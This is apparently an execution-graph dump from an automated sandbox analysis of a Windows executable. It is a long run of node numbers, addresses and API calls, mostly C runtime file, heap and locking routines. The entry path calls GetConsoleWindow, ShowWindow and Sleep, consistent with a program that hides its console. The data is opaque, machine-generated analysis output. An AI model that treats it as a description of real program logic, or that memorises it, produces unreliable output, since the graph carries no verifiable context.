                                                                              execution_graph 22066 ede5e4 22067 ede206 ___scrt_uninitialize_crt 68 API calls 22066->22067 22068 ede5ec 22067->22068 22076 ee807c 22068->22076 22070 ede5f1 22071 ee76b5 14 API calls 22070->22071 22072 ede600 DeleteCriticalSection 22071->22072 22072->22070 22073 ede61b 22072->22073 22074 ee7311 ___free_lconv_mon 14 API calls 22073->22074 22075 ede626 22074->22075 22077 ee8088 ___scrt_is_nonwritable_in_current_image 22076->22077 22086 ee12ea EnterCriticalSection 22077->22086 22079 ee80ff 22087 ee811e 22079->22087 22081 ee8093 22081->22079 22083 ee80d3 DeleteCriticalSection 22081->22083 22084 ede387 69 API calls 22081->22084 22085 ee7311 ___free_lconv_mon 14 API calls 22083->22085 22084->22081 22085->22081 22086->22081 22090 ee1332 LeaveCriticalSection 22087->22090 22089 ee810b 22089->22070 22090->22089 23050 ed3fe0 23051 ed4007 23050->23051 23052 ed405b 23051->23052 23054 ed4021 char_traits 23051->23054 23060 ed4096 codecvt std::ios_base::good std::runtime_error::runtime_error 23051->23060 23070 ed2a90 23052->23070 23056 ed40bd char_traits 23058 ed5110 task 39 API calls 23056->23058 23057 ed4fa0 40 API calls 23057->23060 23058->23054 23059 ed4138 23061 ed41d0 23059->23061 23063 ed4142 char_traits 23059->23063 23060->23054 23060->23056 23060->23057 23060->23059 23066 ed414f std::ios_base::good std::runtime_error::runtime_error 23060->23066 23073 ede3f3 23060->23073 23093 ed6670 23060->23093 23064 ed5110 task 39 API calls 23061->23064 23065 ed5110 task 39 API calls 23063->23065 23064->23054 23065->23054 23067 ed4193 23066->23067 23068 ee08d9 _Ungetc 41 API calls 23066->23068 23069 ed5110 task 39 API calls 23067->23069 23068->23066 23069->23054 23071 ede3f3 _Fgetc 41 API calls 23070->23071 23072 ed2a9d 23071->23072 23072->23054 23074 ede3ff ___scrt_is_nonwritable_in_current_image 23073->23074 23075 ede409 23074->23075 23076 ede421 23074->23076 23077 ee1de8 __dosmaperr 14 API calls 23075->23077 23096 ede676 EnterCriticalSection 23076->23096 23079 ede40e 23077->23079 23081 ee121d ___std_exception_copy 39 API calls 23079->23081 23080 ede42c 23082 ee5c52 _Fgetc 39 API calls 23080->23082 23085 ede444 23080->23085 23092 ede419 _Fgetc 23081->23092 23082->23085 23083 ede4ac 23086 ee1de8 __dosmaperr 14 API calls 23083->23086 23084 ede4d4 23097 ede3b7 23084->23097 23085->23083 23085->23084 23088 ede4b1 23086->23088 23091 ee121d ___std_exception_copy 39 API calls 23088->23091 23089 ede4da 23104 ede504 23089->23104 23091->23092 23092->23060 23108 ed73f0 23093->23108 23095 ed6683 23095->23060 23096->23080 23098 ede3c3 23097->23098 23101 ede3d8 __fread_nolock 23097->23101 23099 ee1de8 __dosmaperr 14 API calls 23098->23099 23100 ede3c8 23099->23100 23102 ee121d ___std_exception_copy 39 API calls 23100->23102 23101->23089 23103 ede3d3 23102->23103 23103->23089 23107 ede68a LeaveCriticalSection 23104->23107 23106 ede50a 23106->23092 23107->23106 23109 ed7407 23108->23109 23110 ed7402 23108->23110 23109->23095 23112 ed7690 23110->23112 23115 ed90bd 23112->23115 23120 ed9021 23115->23120 23118 edb0a3 Concurrency::cancel_current_task RaiseException 23119 ed90dc 23118->23119 23123 ed11b0 23120->23123 23124 edae41 ___std_exception_copy 39 API calls 23123->23124 23125 ed11e9 23124->23125 23125->23118 20323 ee76f5 20324 ee7702 20323->20324 20327 ee771a 20323->20327 20325 ee1de8 __dosmaperr 14 API calls 20324->20325 20326 ee7707 20325->20326 20328 ee121d ___std_exception_copy 39 API calls 20326->20328 20329 ee7779 20327->20329 20330 ee979b _Ungetc 14 API calls 20327->20330 20337 ee7712 20327->20337 20328->20337 20331 ee5c52 _Fgetc 39 API calls 20329->20331 20330->20329 20332 ee7792 20331->20332 20343 ee9cd3 20332->20343 20335 ee5c52 _Fgetc 39 API calls 20336 ee77cb 20335->20336 20336->20337 20338 ee5c52 _Fgetc 39 API calls 20336->20338 20339 ee77d9 20338->20339 20339->20337 20340 ee5c52 _Fgetc 39 API calls 20339->20340 20341 ee77e7 20340->20341 20342 ee5c52 _Fgetc 39 API calls 20341->20342 20342->20337 20344 ee9cdf ___scrt_is_nonwritable_in_current_image 20343->20344 20345 ee9ce7 20344->20345 20350 ee9d02 20344->20350 20346 ee1dd5 __dosmaperr 14 API calls 20345->20346 20347 ee9cec 20346->20347 20348 ee1de8 __dosmaperr 14 API calls 20347->20348 20372 ee779a 20348->20372 20349 ee9d19 20351 ee1dd5 __dosmaperr 14 API calls 20349->20351 20350->20349 20352 ee9d54 20350->20352 20353 ee9d1e 20351->20353 20354 ee9d5d 20352->20354 20355 ee9d72 20352->20355 20356 ee1de8 __dosmaperr 14 API calls 20353->20356 20357 ee1dd5 __dosmaperr 14 API calls 20354->20357 20373 eef13a EnterCriticalSection 20355->20373 20360 ee9d26 20356->20360 20361 ee9d62 20357->20361 20359 ee9d78 20362 ee9dac 20359->20362 20363 ee9d97 20359->20363 20366 ee121d ___std_exception_copy 39 API calls 20360->20366 20364 ee1de8 __dosmaperr 14 API calls 20361->20364 20367 ee9ded __fread_nolock 51 API calls 20362->20367 20365 ee1de8 __dosmaperr 14 API calls 20363->20365 20364->20360 20368 ee9d9c 20365->20368 20366->20372 20369 ee9da7 20367->20369 20370 ee1dd5 __dosmaperr 14 API calls 20368->20370 20374 ee9de4 20369->20374 20370->20369 20372->20335 20372->20337 20373->20359 20377 eef1ef LeaveCriticalSection 20374->20377 20376 ee9dea 20376->20372 20377->20376 22553 ed3ac0 22554 ed3b13 22553->22554 22555 ed3ad2 char_traits 22553->22555 22555->22554 22557 ede20f 22555->22557 22558 ede221 22557->22558 22561 ede22a ___scrt_uninitialize_crt 22557->22561 22559 ede097 ___scrt_uninitialize_crt 68 API calls 22558->22559 22560 ede227 22559->22560 22560->22554 22562 ede239 22561->22562 22565 ede037 22561->22565 22562->22554 22566 ede043 ___scrt_is_nonwritable_in_current_image 22565->22566 22573 ede676 EnterCriticalSection 22566->22573 22568 ede051 22569 ede1a1 ___scrt_uninitialize_crt 68 API calls 22568->22569 22570 ede062 22569->22570 22574 ede08b 22570->22574 22573->22568 22577 ede68a LeaveCriticalSection 22574->22577 22576 ede074 22576->22554 22577->22576 20921 ee60d6 20922 ee60f1 20921->20922 20923 ee60e1 20921->20923 20927 ee60f7 20923->20927 20926 ee7311 ___free_lconv_mon 14 API calls 20926->20922 20928 ee610c 20927->20928 20929 ee6112 20927->20929 20930 ee7311 ___free_lconv_mon 14 API calls 20928->20930 20931 ee7311 ___free_lconv_mon 14 API calls 20929->20931 20930->20929 20932 ee611e 20931->20932 20933 ee7311 ___free_lconv_mon 14 API calls 20932->20933 20934 ee6129 20933->20934 20935 ee7311 ___free_lconv_mon 14 API calls 20934->20935 20936 ee6134 20935->20936 20937 ee7311 ___free_lconv_mon 14 API calls 20936->20937 20938 ee613f 20937->20938 20939 ee7311 ___free_lconv_mon 14 API calls 20938->20939 20940 ee614a 20939->20940 20941 ee7311 ___free_lconv_mon 14 API calls 20940->20941 20942 ee6155 20941->20942 20943 ee7311 ___free_lconv_mon 14 API calls 20942->20943 20944 ee6160 20943->20944 20945 ee7311 ___free_lconv_mon 14 API calls 20944->20945 20946 ee616b 20945->20946 20947 ee7311 ___free_lconv_mon 14 API calls 20946->20947 20948 ee6179 20947->20948 20953 ee5f23 20948->20953 20954 ee5f2f ___scrt_is_nonwritable_in_current_image 20953->20954 20969 ee12ea EnterCriticalSection 20954->20969 20956 ee5f39 20957 ee5f63 20956->20957 20960 ee7311 ___free_lconv_mon 14 API calls 20956->20960 20970 ee5f82 20957->20970 20960->20957 20961 ee5f8e 20962 ee5f9a ___scrt_is_nonwritable_in_current_image 20961->20962 20974 ee12ea EnterCriticalSection 20962->20974 20964 ee5fa4 20965 ee61c4 __dosmaperr 14 API calls 20964->20965 20966 ee5fb7 20965->20966 20975 ee5fd7 20966->20975 20969->20956 20973 ee1332 LeaveCriticalSection 20970->20973 20972 ee5f70 20972->20961 20973->20972 20974->20964 20978 ee1332 LeaveCriticalSection 20975->20978 20977 ee5fc5 20977->20926 20978->20977 22623 ed42d0 22624 ed42e2 char_traits 22623->22624 22626 ed4354 char_traits 22624->22626 22627 ed2b00 22624->22627 22630 ee08d9 22627->22630 22631 ee08e5 ___scrt_is_nonwritable_in_current_image 22630->22631 22632 ee08ec 22631->22632 22633 ee0901 22631->22633 22635 ee1de8 __dosmaperr 14 API calls 22632->22635 22643 ede676 EnterCriticalSection 22633->22643 22637 ee08f1 22635->22637 22636 ee090b 22644 ee07e5 22636->22644 22639 ee121d ___std_exception_copy 39 API calls 22637->22639 22642 ed2b14 22639->22642 22642->22626 22643->22636 22645 ee07fd 22644->22645 22648 ee086d 22644->22648 22646 ee5c52 _Fgetc 39 API calls 22645->22646 22647 ee0803 22646->22647 22647->22648 22650 ee0855 22647->22650 22649 ee979b _Ungetc 14 API calls 22648->22649 22652 ee0865 22648->22652 22649->22652 22651 ee1de8 __dosmaperr 14 API calls 22650->22651 22653 ee085a 22651->22653 22655 ee0944 22652->22655 22654 ee121d ___std_exception_copy 39 API calls 22653->22654 22654->22652 22658 ede68a LeaveCriticalSection 22655->22658 22657 ee094a 22657->22642 22658->22657 21225 ed10d3 21228 eda140 21225->21228 21231 eda113 21228->21231 21232 eda129 21231->21232 21233 eda122 21231->21233 21240 ee52e4 21232->21240 21237 ee5267 21233->21237 21236 ed10d8 21238 ee52e4 42 API calls 21237->21238 21239 ee5279 21238->21239 21239->21236 21243 ee5030 21240->21243 21244 ee503c ___scrt_is_nonwritable_in_current_image 21243->21244 21251 ee12ea EnterCriticalSection 21244->21251 21246 ee504a 21252 ee508b 21246->21252 21248 ee5057 21262 ee507f 21248->21262 21251->21246 21253 ee50a6 21252->21253 21254 ee5119 std::_Lockit::_Lockit 21252->21254 21253->21254 21255 ee50f9 21253->21255 21265 ef16ab 21253->21265 21254->21248 21255->21254 21257 ef16ab 42 API calls 21255->21257 21259 ee510f 21257->21259 21258 ee50ef 21260 ee7311 ___free_lconv_mon 14 API calls 21258->21260 21261 ee7311 ___free_lconv_mon 14 API calls 21259->21261 21260->21255 21261->21254 21293 ee1332 LeaveCriticalSection 21262->21293 21264 ee5068 21264->21236 21266 ef16b8 21265->21266 21267 ef16d3 21265->21267 21266->21267 21268 ef16c4 21266->21268 21269 ef16e2 21267->21269 21274 ef58ca 21267->21274 21270 ee1de8 __dosmaperr 14 API calls 21268->21270 21281 eec2d3 21269->21281 21273 ef16c9 __fread_nolock 21270->21273 21273->21258 21275 ef58ea HeapSize 21274->21275 21276 ef58d5 21274->21276 21275->21269 21277 ee1de8 __dosmaperr 14 API calls 21276->21277 21278 ef58da 21277->21278 21279 ee121d ___std_exception_copy 39 API calls 21278->21279 21280 ef58e5 21279->21280 21280->21269 21282 eec2eb 21281->21282 21283 eec2e0 21281->21283 21285 eec2f3 21282->21285 21291 eec2fc __dosmaperr 21282->21291 21284 ee824e std::_Locinfo::_Locinfo_dtor 15 API calls 21283->21284 21290 eec2e8 21284->21290 21288 ee7311 ___free_lconv_mon 14 API calls 21285->21288 21286 eec326 HeapReAlloc 21286->21290 21286->21291 21287 eec301 21289 ee1de8 __dosmaperr 14 API calls 21287->21289 21288->21290 21289->21290 21290->21273 21291->21286 21291->21287 21292 ee2b49 std::_Facet_Register 2 API calls 21291->21292 21292->21291 21293->21264 20378 eeaca0 20383 eeaa76 20378->20383 20381 eeacdf 20384 eeaa95 20383->20384 20385 eeaaa8 20384->20385 20393 eeaabd 20384->20393 20386 ee1de8 __dosmaperr 14 API calls 20385->20386 20387 eeaaad 20386->20387 20388 ee121d ___std_exception_copy 39 API calls 20387->20388 20389 eeaab8 20388->20389 20389->20381 20400 ef425e 20389->20400 20390 ee1de8 __dosmaperr 14 API calls 20391 eeac8e 20390->20391 20392 ee121d ___std_exception_copy 39 API calls 20391->20392 20392->20389 20393->20393 20398 eeabdd 20393->20398 20403 ef3ace 20393->20403 20395 eeac2d 20396 ef3ace 39 API calls 20395->20396 20395->20398 20397 eeac4b 20396->20397 20397->20398 20399 ef3ace 39 API calls 20397->20399 20398->20389 20398->20390 20399->20398 20435 ef3c06 20400->20435 20404 ef3add 20403->20404 20405 ef3b25 20403->20405 20407 ef3ae3 20404->20407 20410 ef3b00 20404->20410 20417 ef3b3b 20405->20417 20409 ee1de8 __dosmaperr 14 API calls 20407->20409 20408 ef3af3 20408->20395 20411 ef3ae8 20409->20411 20413 ee1de8 __dosmaperr 14 API calls 20410->20413 20416 ef3b1e 20410->20416 20412 ee121d ___std_exception_copy 39 API calls 20411->20412 20412->20408 20414 ef3b0f 20413->20414 20415 ee121d ___std_exception_copy 39 API calls 20414->20415 20415->20408 20416->20395 20418 ef3b4b 20417->20418 20419 ef3b65 20417->20419 20420 ee1de8 __dosmaperr 14 API calls 20418->20420 20421 ef3b6d 20419->20421 20422 ef3b84 20419->20422 20425 ef3b50 20420->20425 20426 ee1de8 __dosmaperr 14 API calls 20421->20426 20423 ef3ba7 20422->20423 20424 ef3b90 20422->20424 20431 ee1dfb ctype 39 API calls 20423->20431 20434 ef3b5b 20423->20434 20427 ee1de8 __dosmaperr 14 API calls 20424->20427 20428 ee121d ___std_exception_copy 39 API calls 20425->20428 20429 ef3b72 20426->20429 20430 ef3b95 20427->20430 20428->20434 20432 ee121d ___std_exception_copy 39 API calls 20429->20432 20433 ee121d ___std_exception_copy 39 API calls 20430->20433 20431->20434 20432->20434 20433->20434 20434->20408 20437 ef3c12 ___scrt_is_nonwritable_in_current_image 20435->20437 20436 ef3c19 20438 ee1de8 __dosmaperr 14 API calls 20436->20438 20437->20436 20439 ef3c44 20437->20439 20440 ef3c1e 20438->20440 20446 ef41f0 20439->20446 20442 ee121d ___std_exception_copy 39 API calls 20440->20442 20445 ef3c28 20442->20445 20445->20381 20459 eeda4f 20446->20459 20451 ef4226 20453 ef3c68 20451->20453 20454 ee7311 ___free_lconv_mon 14 API calls 20451->20454 20455 ef3c9b 20453->20455 20454->20453 20456 ef3ca1 20455->20456 20457 ef3cdf 20455->20457 20776 eef1ef LeaveCriticalSection 20456->20776 20457->20445 20460 ee1dfb ctype 39 API calls 20459->20460 20461 eeda61 20460->20461 20462 eeda73 20461->20462 20513 ee7c56 20461->20513 20464 ee2759 20462->20464 20519 ee25e5 20464->20519 20467 ef427e 20468 ef429b 20467->20468 20469 ef42c9 20468->20469 20470 ef42b0 20468->20470 20549 eef212 20469->20549 20471 ee1dd5 __dosmaperr 14 API calls 20470->20471 20473 ef42b5 20471->20473 20478 ee1de8 __dosmaperr 14 API calls 20473->20478 20475 ef42ee 20562 ef3f37 CreateFileW 20475->20562 20476 ef42d7 20479 ee1dd5 __dosmaperr 14 API calls 20476->20479 20480 ef42c2 20478->20480 20481 ef42dc 20479->20481 20480->20451 20483 ee1de8 __dosmaperr 14 API calls 20481->20483 20482 ef43a4 GetFileType 20485 ef43af GetLastError 20482->20485 20486 ef43f6 20482->20486 20483->20473 20484 ef4379 GetLastError 20488 ee1d8e __dosmaperr 14 API calls 20484->20488 20489 ee1d8e __dosmaperr 14 API calls 20485->20489 20564 eef15d 20486->20564 20487 ef4327 20487->20482 20487->20484 20563 ef3f37 CreateFileW 20487->20563 20488->20473 20491 ef43bd CloseHandle 20489->20491 20491->20473 20494 ef43e6 20491->20494 20493 ef436c 20493->20482 20493->20484 20495 ee1de8 __dosmaperr 14 API calls 20494->20495 20497 ef43eb 20495->20497 20497->20473 20498 ef4463 20503 ef446a 20498->20503 20594 ef3ce1 20498->20594 20502 ef44a6 20502->20480 20505 ef4522 CloseHandle 20502->20505 20588 ee747f 20503->20588 20621 ef3f37 CreateFileW 20505->20621 20507 ef454d 20508 ef4583 20507->20508 20509 ef4557 GetLastError 20507->20509 20508->20480 20510 ee1d8e __dosmaperr 14 API calls 20509->20510 20511 ef4563 20510->20511 20622 eef325 20511->20622 20516 ee79a8 20513->20516 20517 ee7b91 std::_Lockit::_Lockit 5 API calls 20516->20517 20518 ee79be 20517->20518 20518->20462 20520 ee260d 20519->20520 20521 ee25f3 20519->20521 20523 ee2633 20520->20523 20524 ee2614 20520->20524 20537 ee279a 20521->20537 20525 eed777 __wsopen_s MultiByteToWideChar 20523->20525 20536 ee25fd 20524->20536 20541 ee27db 20524->20541 20526 ee2642 20525->20526 20528 ee2649 GetLastError 20526->20528 20530 ee266f 20526->20530 20532 ee27db __wsopen_s 15 API calls 20526->20532 20529 ee1d8e __dosmaperr 14 API calls 20528->20529 20531 ee2655 20529->20531 20533 eed777 __wsopen_s MultiByteToWideChar 20530->20533 20530->20536 20534 ee1de8 __dosmaperr 14 API calls 20531->20534 20532->20530 20535 ee2686 20533->20535 20534->20536 20535->20528 20535->20536 20536->20451 20536->20467 20538 ee27a5 20537->20538 20540 ee27ad 20537->20540 20539 ee7311 ___free_lconv_mon 14 API calls 20538->20539 20539->20540 20540->20536 20542 ee279a __wsopen_s 14 API calls 20541->20542 20543 ee27e9 20542->20543 20546 ee281a 20543->20546 20547 ee824e std::_Locinfo::_Locinfo_dtor 15 API calls 20546->20547 20548 ee27fa 20547->20548 20548->20536 20550 eef21e ___scrt_is_nonwritable_in_current_image 20549->20550 20631 ee12ea EnterCriticalSection 20550->20631 20552 eef225 20553 eef24a 20552->20553 20558 eef2b9 EnterCriticalSection 20552->20558 20561 eef26c 20552->20561 20635 eeefec 20553->20635 20560 eef2c6 LeaveCriticalSection 20558->20560 20558->20561 20560->20552 20632 eef31c 20561->20632 20562->20487 20563->20493 20565 eef16c 20564->20565 20566 eef1d5 20564->20566 20565->20566 20569 eef192 __wsopen_s 20565->20569 20567 ee1de8 __dosmaperr 14 API calls 20566->20567 20568 eef1da 20567->20568 20570 ee1dd5 __dosmaperr 14 API calls 20568->20570 20571 eef1c2 20569->20571 20572 eef1bc SetStdHandle 20569->20572 20570->20571 20571->20498 20573 ef4146 20571->20573 20572->20571 20574 ef416e 20573->20574 20575 ef41a0 20573->20575 20574->20575 20576 eea37e __fread_nolock 41 API calls 20574->20576 20575->20498 20577 ef417e 20576->20577 20578 ef418e 20577->20578 20579 ef41a4 20577->20579 20580 ee1dd5 __dosmaperr 14 API calls 20578->20580 20581 ee9ded __fread_nolock 51 API calls 20579->20581 20582 ef4193 20580->20582 20583 ef41b6 20581->20583 20582->20575 20585 ee1de8 __dosmaperr 14 API calls 20582->20585 20584 ef41cc 20583->20584 20644 ef5fce 20583->20644 20584->20582 20586 eea37e __fread_nolock 41 API calls 20584->20586 20585->20575 20586->20582 20589 ee7492 _Fputc 20588->20589 20750 ee74af 20589->20750 20591 ee749e 20592 eddccb _Fputc 39 API calls 20591->20592 20593 ee74aa 20592->20593 20593->20480 20595 ef3d12 20594->20595 20616 ef3dfc 20594->20616 20603 ef3d32 20595->20603 20763 ee3739 20595->20763 20597 ef3d29 20598 ef3f2c 20597->20598 20597->20603 20599 ee124a __Getctype 11 API calls 20598->20599 20600 ef3f36 20599->20600 20601 ef3df3 20601->20616 20620 ef3e2c 20601->20620 20770 ee6fad 20601->20770 20602 ee9ded __fread_nolock 51 API calls 20607 ef3e52 20602->20607 20603->20601 20604 eea37e __fread_nolock 41 API calls 20603->20604 20603->20616 20618 ef3e22 20603->20618 20605 ef3e0c 20604->20605 20605->20601 20611 ef3e17 20605->20611 20608 ef3ebd 20607->20608 20609 ef3e8a 20607->20609 20610 ef3e97 20607->20610 20607->20616 20607->20620 20617 eea37e __fread_nolock 41 API calls 20608->20617 20613 ee1de8 __dosmaperr 14 API calls 20609->20613 20610->20608 20615 ef3e9f 20610->20615 20614 eea37e __fread_nolock 41 API calls 20611->20614 20612 ee1de8 __dosmaperr 14 API calls 20612->20616 20613->20620 20614->20618 20619 eea37e __fread_nolock 41 API calls 20615->20619 20616->20502 20616->20503 20617->20620 20618->20602 20618->20616 20618->20620 20619->20620 20620->20612 20620->20616 20621->20507 20623 eef39b 20622->20623 20624 eef334 20622->20624 20625 ee1de8 __dosmaperr 14 API calls 20623->20625 20624->20623 20630 eef35e __wsopen_s 20624->20630 20626 eef3a0 20625->20626 20627 ee1dd5 __dosmaperr 14 API calls 20626->20627 20628 eef38b 20627->20628 20628->20508 20629 eef385 SetStdHandle 20629->20628 20630->20628 20630->20629 20631->20552 20643 ee1332 LeaveCriticalSection 20632->20643 20634 eef28c 20634->20475 20634->20476 20636 ee788f __dosmaperr 14 API calls 20635->20636 20638 eeeffe 20636->20638 20637 eef00b 20639 ee7311 ___free_lconv_mon 14 API calls 20637->20639 20638->20637 20641 ee7ea0 __wsopen_s 6 API calls 20638->20641 20640 eef060 20639->20640 20640->20561 20642 eef13a EnterCriticalSection 20640->20642 20641->20638 20642->20561 20643->20634 20645 ef5fe1 _Fputc 20644->20645 20650 ef6005 20645->20650 20648 eddccb _Fputc 39 API calls 20649 ef6000 20648->20649 20649->20584 20670 ef5f81 20650->20670 20652 ef611f 20656 eea37e __fread_nolock 41 API calls 20652->20656 20664 ef60e8 20652->20664 20654 ef6061 20657 ee788f __dosmaperr 14 API calls 20654->20657 20655 eea37e __fread_nolock 41 API calls 20658 ef5ff3 20655->20658 20659 ef6137 20656->20659 20665 ef606d __wsopen_s 20657->20665 20658->20648 20660 eef3b6 __wsopen_s 39 API calls 20659->20660 20659->20664 20661 ef614f SetEndOfFile 20660->20661 20662 ef615b GetLastError 20661->20662 20661->20664 20662->20664 20663 ee7311 ___free_lconv_mon 14 API calls 20663->20664 20664->20655 20667 ef6075 20665->20667 20668 ef60d9 __wsopen_s 20665->20668 20675 ee70f5 20665->20675 20667->20663 20669 ee7311 ___free_lconv_mon 14 API calls 20668->20669 20669->20664 20671 eea37e __fread_nolock 41 API calls 20670->20671 20672 ef5f9a 20671->20672 20673 eea37e __fread_nolock 41 API calls 20672->20673 20674 ef5fa9 20673->20674 20674->20652 20674->20654 20674->20664 20676 ee711d 20675->20676 20702 ee7140 __wsopen_s 20675->20702 20677 ee7121 20676->20677 20679 ee717c 20676->20679 20678 ee11a0 _Fputc 29 API calls 20677->20678 20678->20702 20680 ee719a 20679->20680 20681 eea3be __wsopen_s 41 API calls 20679->20681 20703 ee6c3a 20680->20703 20681->20680 20684 ee71f9 20686 ee720d 20684->20686 20687 ee7262 WriteFile 20684->20687 20685 ee71b2 20688 ee71e1 20685->20688 20693 ee71ba 20685->20693 20691 ee724e 20686->20691 20692 ee7215 20686->20692 20689 ee7284 GetLastError 20687->20689 20687->20702 20715 ee680b GetConsoleOutputCP 20688->20715 20689->20702 20743 ee6cb7 20691->20743 20694 ee723a 20692->20694 20695 ee721a 20692->20695 20693->20702 20710 ee6bd2 20693->20710 20735 ee6e7b 20694->20735 20698 ee7223 20695->20698 20695->20702 20728 ee6d92 20698->20728 20700 ee71f4 20700->20702 20702->20665 20704 ef1cf0 __fread_nolock 39 API calls 20703->20704 20707 ee6c4c 20704->20707 20705 ee6cb0 20705->20684 20705->20685 20706 ee6c7a 20706->20705 20709 ee6c94 GetConsoleMode 20706->20709 20707->20705 20707->20706 20708 ee0400 _fread 39 API calls 20707->20708 20708->20706 20709->20705 20711 ee6bf4 20710->20711 20712 ee6c29 20710->20712 20711->20712 20713 ef1ebd 5 API calls __wsopen_s 20711->20713 20714 ee6c2b GetLastError 20711->20714 20712->20702 20713->20711 20714->20712 20716 ee687d 20715->20716 20720 ee6884 ctype 20715->20720 20717 ee0400 _fread 39 API calls 20716->20717 20717->20720 20718 eda155 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20719 ee6bcb 20718->20719 20719->20700 20721 ee901b 40 API calls __wsopen_s 20720->20721 20722 ee6b3a 20720->20722 20723 eed831 _fread WideCharToMultiByte 20720->20723 20724 ee6ab3 WriteFile 20720->20724 20726 ef1db5 5 API calls std::_Locinfo::_Locinfo_dtor 20720->20726 20727 ee6af1 WriteFile 20720->20727 20721->20720 20722->20718 20723->20720 20724->20720 20725 ee6ba9 GetLastError 20724->20725 20725->20722 20726->20720 20727->20720 20727->20725 20733 ee6da1 __wsopen_s 20728->20733 20729 ee6e60 20730 eda155 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20729->20730 20732 ee6e79 20730->20732 20731 ee6e16 WriteFile 20731->20733 20734 ee6e62 GetLastError 20731->20734 20732->20702 20733->20729 20733->20731 20734->20729 20742 ee6e8a __wsopen_s 20735->20742 20736 ee6f92 20737 eda155 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20736->20737 20738 ee6fab 20737->20738 20738->20700 20739 eed831 _fread WideCharToMultiByte 20739->20742 20740 ee6f94 GetLastError 20740->20736 20741 ee6f49 WriteFile 20741->20740 20741->20742 20742->20736 20742->20739 20742->20740 20742->20741 20747 ee6cc6 __wsopen_s 20743->20747 20744 ee6d77 20745 eda155 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20744->20745 20746 ee6d90 20745->20746 20746->20700 20747->20744 20748 ee6d36 WriteFile 20747->20748 20748->20747 20749 ee6d79 GetLastError 20748->20749 20749->20744 20751 eef3b6 __wsopen_s 39 API calls 20750->20751 20754 ee74bf 20751->20754 20752 ee74c5 20753 eef325 __wsopen_s 15 API calls 20752->20753 20762 ee751d __wsopen_s 20753->20762 20754->20752 20755 ee74f7 20754->20755 20757 eef3b6 __wsopen_s 39 API calls 20754->20757 20755->20752 20756 eef3b6 __wsopen_s 39 API calls 20755->20756 20759 ee7503 CloseHandle 20756->20759 20758 ee74ee 20757->20758 20760 eef3b6 __wsopen_s 39 API calls 20758->20760 20759->20752 20761 ee750f GetLastError 20759->20761 20760->20755 20761->20752 20762->20591 20764 ee375a 20763->20764 20765 ee3745 20763->20765 20764->20597 20766 ee1de8 __dosmaperr 14 API calls 20765->20766 20767 ee374a 20766->20767 20768 ee121d ___std_exception_copy 39 API calls 20767->20768 20769 ee3755 20768->20769 20769->20597 20771 ee6fc0 _Fputc 20770->20771 20772 ee6fe4 __wsopen_s 64 API calls 20771->20772 20773 ee6fd2 20772->20773 20774 eddccb _Fputc 39 API calls 20773->20774 20775 ee6fdf 20774->20775 20775->20601 20776->20457 22865 ee6660 22866 ee666c ___scrt_is_nonwritable_in_current_image 22865->22866 22877 ee12ea EnterCriticalSection 22866->22877 22868 ee6673 22878 eef09c 22868->22878 22875 ee65b0 2 API calls 22876 ee6691 22875->22876 22897 ee66b7 22876->22897 22877->22868 22879 eef0a8 ___scrt_is_nonwritable_in_current_image 22878->22879 22880 eef0d2 22879->22880 22881 eef0b1 22879->22881 22900 ee12ea EnterCriticalSection 22880->22900 22883 ee1de8 __dosmaperr 14 API calls 22881->22883 22885 eef0b6 22883->22885 22884 eef0de 22888 eeefec __wsopen_s 15 API calls 22884->22888 22890 eef10a 22884->22890 22886 ee121d ___std_exception_copy 39 API calls 22885->22886 22889 ee6682 22886->22889 22888->22884 22889->22876 22891 ee64fa GetStartupInfoW 22889->22891 22901 eef131 22890->22901 22892 ee65ab 22891->22892 22893 ee6517 22891->22893 22892->22875 22893->22892 22894 eef09c 40 API calls 22893->22894 22895 ee653f 22894->22895 22895->22892 22896 ee656f GetFileType 22895->22896 22896->22895 22905 ee1332 LeaveCriticalSection 22897->22905 22899 ee66a2 22900->22884 22904 ee1332 LeaveCriticalSection 22901->22904 22903 eef138 22903->22889 22904->22903 22905->22899 17869 ed9d78 17870 ed9d84 ___scrt_is_nonwritable_in_current_image 17869->17870 17895 ed9f7a 17870->17895 17872 ed9d8b 17873 ed9ee4 17872->17873 17882 ed9db5 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler ___scrt_release_startup_lock 17872->17882 17932 eda417 IsProcessorFeaturePresent 17873->17932 17875 ed9eeb 17936 ee3723 17875->17936 17880 ed9dd4 17881 ed9e55 17906 ee336e 17881->17906 17882->17880 17882->17881 17915 ee36fd 17882->17915 17885 ed9e5b 17910 ed34b0 GetConsoleWindow ShowWindow Sleep 17885->17910 17896 ed9f83 17895->17896 17942 eda685 IsProcessorFeaturePresent 17896->17942 17900 ed9f94 17901 ed9f98 17900->17901 17952 ee5412 17900->17952 17901->17872 17904 ed9faf 17904->17872 17907 ee3377 17906->17907 17908 ee337c 17906->17908 18026 ee30c8 17907->18026 17908->17885 18677 ed3150 17910->18677 17916 ee3713 ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 17915->17916 17916->17881 17917 ee620f __Getctype 39 API calls 17916->17917 17920 ee54c4 17917->17920 17918 ee1d07 __FrameHandler3::FrameUnwindToState 39 API calls 17919 ee54ee 17918->17919 17920->17918 17933 eda42d __InternalCxxFrameHandler __fread_nolock 17932->17933 17934 eda4d8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17933->17934 17935 eda523 __InternalCxxFrameHandler 17934->17935 17935->17875 17937 ee3515 __InternalCxxFrameHandler 21 API calls 17936->17937 17938 ed9ef1 17937->17938 17939 ee36e7 17938->17939 17940 ee3515 __InternalCxxFrameHandler 21 API calls 17939->17940 17941 ed9ef9 17940->17941 17943 ed9f8f 17942->17943 17944 edc8ae 17943->17944 17961 edd977 17944->17961 17948 edc8ca 17948->17900 17949 edc8bf 17949->17948 17975 edd9b3 17949->17975 17951 edc8b7 17951->17900 18017 ef1733 17952->18017 17955 edc8cd 17956 edc8d6 17955->17956 17957 edc8e0 17955->17957 17958 edca46 ___vcrt_uninitialize_ptd 6 API calls 17956->17958 17957->17901 17959 edc8db 17958->17959 17960 edd9b3 ___vcrt_uninitialize_locks DeleteCriticalSection 17959->17960 17960->17957 17962 edd980 17961->17962 17964 edd9a9 17962->17964 17965 edc8b3 17962->17965 17979 eddbb4 17962->17979 17966 edd9b3 ___vcrt_uninitialize_locks DeleteCriticalSection 17964->17966 